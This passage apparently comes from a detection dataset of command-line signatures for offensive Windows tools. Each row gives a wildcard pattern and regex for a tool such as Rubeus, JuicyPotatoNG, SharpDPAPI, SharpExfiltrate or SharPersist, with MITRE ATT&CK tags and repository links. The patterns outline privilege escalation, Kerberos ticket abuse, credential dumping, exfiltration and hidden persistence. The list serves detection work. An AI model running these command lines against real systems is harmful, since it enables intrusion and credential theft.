{B91D5831-B1BD-4608-8198-D72E155020F7}*",".{0,1000}\.exe\s\-l\s.{0,1000}\s\-c\s\{B91D5831\-B1BD\-4608\-8198\-D72E155020F7\}.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*.exe -l * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a*",".{0,1000}\.exe\s\-l\s.{0,1000}\s\-c\s\{F7FD3FD6\-9994\-452D\-8DA7\-9A8FD87AEEF4\}\s\-a.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*.exe --LDAPs --DisableSigning*",".{0,1000}\.exe\s\-\-LDAPs\s\-\-DisableSigning.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*.exe localhost add * ""cmd.exe"" ""/c *"" *daily*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}daily.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). 
- Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*.exe localhost add * ""cmd.exe"" ""/c *"" *logon*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}logon.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*.exe localhost add * ""cmd.exe"" ""/c *"" *second*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}second.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*.exe localhost add * ""cmd.exe"" ""/c *"" *weekly*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}weekly.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g.
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*.exe machinetriage*",".{0,1000}\.exe\smachinetriage.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe masterkeys /hashes*",".{0,1000}\.exe\smasterkeys\s\/hashes.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe McAfeeSitelistFiles*",".{0,1000}\.exe\sMcAfeeSitelistFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported.
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.EXE Meterpreter Reverse HTTP and HTTPS loader*",".{0,1000}\.EXE\sMeterpreter\sReverse\sHTTP\sand\sHTTPS\sloader.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*.exe ModifiableScheduledTask*",".{0,1000}\.exe\sModifiableScheduledTask.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe ModifiableServiceBinaries*",".{0,1000}\.exe\sModifiableServiceBinaries.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe ModifiableServiceRegistryKeys*",".{0,1000}\.exe\sModifiableServiceRegistryKeys.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe ModifiableServices*",".{0,1000}\.exe\sModifiableServices.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe monitor /interval:5 /nowrap",".{0,1000}\.exe\smonitor\s\/interval\:5\s\/nowrap","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe NonstandardProcesses*",".{0,1000}\.exe\sNonstandardProcesses.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe NTLMSettings*",".{0,1000}\.exe\sNTLMSettings.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe OneDrive --username * --password * --filepath *\*.exe*",".{0,1000}\.exe\sOneDrive\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-filepath\s.{0,1000}\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*.exe --override-file --source-file *.exe*",".{0,1000}\.exe\s\-\-override\-file\s\-\-source\-file\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*.exe --path C:\ -r --method 
VirtualAlloc*",".{0,1000}\.exe\s\-\-path\sC\:\\\s\-r\s\-\-method\sVirtualAlloc.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*.exe ProcessDLLHijack*",".{0,1000}\.exe\sProcessDLLHijack.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe ptt /ticket:*",".{0,1000}\.exe\sptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe ptt /ticket:*.kirbi",".{0,1000}\.exe\sptt\s\/ticket\:.{0,1000}\.kirbi","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*.exe -ptt ticket:*.kirbi*",".{0,1000}\.exe\s\-ptt\sticket\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","5","450","65","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*.exe --pwsh *.ps1 *.exe*",".{0,1000}\.exe\s\-\-pwsh\s.{0,1000}\.ps1\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe -q InterestingProcesses*",".{0,1000}\.exe\s\-q\sInterestingProcesses.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -q PowerShell*",".{0,1000}\.exe\s\-q\sPowerShell.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. 
including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -q WindowsDefender*",".{0,1000}\.exe\s\-q\sWindowsDefender.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe RBCD -action read -delegate-to *",".{0,1000}\.exe\sRBCD\s\-action\sread\s\-delegate\-to\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe rbcd -m * -p * -c *cmd.exe*",".{0,1000}\.exe\srbcd\s\-m\s.{0,1000}\s\-p\s.{0,1000}\s\-c\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*.exe RegistryAutoLogons*",".{0,1000}\.exe\sRegistryAutoLogons.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe RegistryAutoruns*",".{0,1000}\.exe\sRegistryAutoruns.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe relay -Domain * -CreateNewComputerAccount *",".{0,1000}\.exe\srelay\s\-Domain\s.{0,1000}\s\-CreateNewComputerAccount\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*.exe --remove-reparse --source-file *.exe*",".{0,1000}\.exe\s\-\-remove\-reparse\s\-\-source\-file\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*.exe -s * -c service_mod *",".{0,1000}\.exe\s\-s\s.{0,1000}\s\-c\sservice_mod\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*.exe -s *\x*\x*\x*",".{0,1000}\.exe\s\-s\s.{0,1000}\\x.{0,1000}\\x.{0,1000}\\x.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*.exe s4u /ticket:* /impersonateuser:* /msdsspn:* /ptt*",".{0,1000}\.exe\ss4u\s\/ticket\:.{0,1000}\s\/impersonateuser\:.{0,1000}\s\/msdsspn\:.{0,1000}\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe s4u /user:* /impersonateuser:* /msdsspn:* /altservice:ldap /ptt /rc4*",".{0,1000}\.exe\ss4u\s\/user\:.{0,1000}\s\/impersonateuser\:.{0,1000}\s\/msdsspn\:.{0,1000}\s\/altservice\:ldap\s\/ptt\s\/rc4.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus access the LDAP service on the DC (for dcsync)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe --schedule * *.exe*",".{0,1000}\.exe\s\-\-schedule\s.{0,1000}\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe --screensaver *:\*.exe*",".{0,1000}\.exe\s\-\-screensaver\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe Search Find-Persist*",".{0,1000}\.exe\sSearch\sFind\-Persist.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*.exe --set-reparse override --source-file *.exe --target-file *",".{0,1000}\.exe\s\-\-set\-reparse\soverride\s\-\-source\-file\s.{0,1000}\.exe\s\-\-target\-file\s.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*.exe shadowcred -c * -f*",".{0,1000}\.exe\sshadowcred\s\-c\s.{0,1000}\s\-f.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via 
Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*.exe --showstats -c *\cache.txt*",".{0,1000}\.exe\s\-\-showstats\s\-c\s.{0,1000}\\cache\.txt.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*.exe --signature --driver*",".{0,1000}\.exe\s\-\-signature\s\-\-driver.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*.exe silver /sids:*/target:*",".{0,1000}\.exe\ssilver\s\/sids\:.{0,1000}\/target\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*.exe -sniffer n*",".{0,1000}\.exe\s\-sniffer\sn.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*.exe --spn --domain * --user * --pass 
*",".{0,1000}\.exe\s\-\-spn\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*.exe --startup *:\*.exe*",".{0,1000}\.exe\s\-\-startup\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe -t keepass -f *",".{0,1000}\.exe\s\-t\skeepass\s\-f\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*.exe -t startupfolder -c * -a * -f*",".{0,1000}\.exe\s\-t\sstartupfolder\s\-c\s.{0,1000}\s\-a\s.{0,1000}\s\-f.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*.exe -t tortoisesvn -c * -a * -m*",".{0,1000}\.exe\s\-t\stortoisesvn\s\-c\s.{0,1000}\s\-a\s.{0,1000}\s\-m.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - 
TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*.exe -t wl-extract.dll -d *.dat -r *.rsa -*.exe*",".{0,1000}\.exe\s\-t\swl\-extract\.dll\s\-d\s.{0,1000}\.dat\s\-r\s.{0,1000}\.rsa\s\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*.exe --targettask * --targetbinary *",".{0,1000}\.exe\s\-\-targettask\s.{0,1000}\s\-\-targetbinary\s\s.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","0","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*.exe TokenPrivileges*",".{0,1000}\.exe\sTokenPrivileges.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe triage",".{0,1000}\.exe\striage","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe triage /password:*",".{0,1000}\.exe\striage\s\/password\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe -u * -s 2 -c cmd.exe*",".{0,1000}\.exe\s\-u\s.{0,1000}\s\-s\s2\s\-c\scmd\.exe.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - 